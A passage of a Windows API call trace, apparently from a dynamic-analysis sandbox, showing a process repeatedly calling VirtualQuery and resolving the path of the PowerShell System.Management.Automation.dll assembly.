	[0349.099] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.099] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.100] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.100] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.103] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.105] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.108] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.108] VirtualQuery (in: lpAddress=0xabdb0, lpBuffer=0xacc70, dwLength=0x30 | out: lpBuffer=0xacc70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.109] VirtualQuery (in: lpAddress=0xab4a0, lpBuffer=0xac360, dwLength=0x30 | out: lpBuffer=0xac360*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.109] VirtualQuery (in: lpAddress=0xab530, lpBuffer=0xac3f0, dwLength=0x30 | out: lpBuffer=0xac3f0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.109] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.110] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.110] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.110] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.110] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.111] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.111] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.111] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
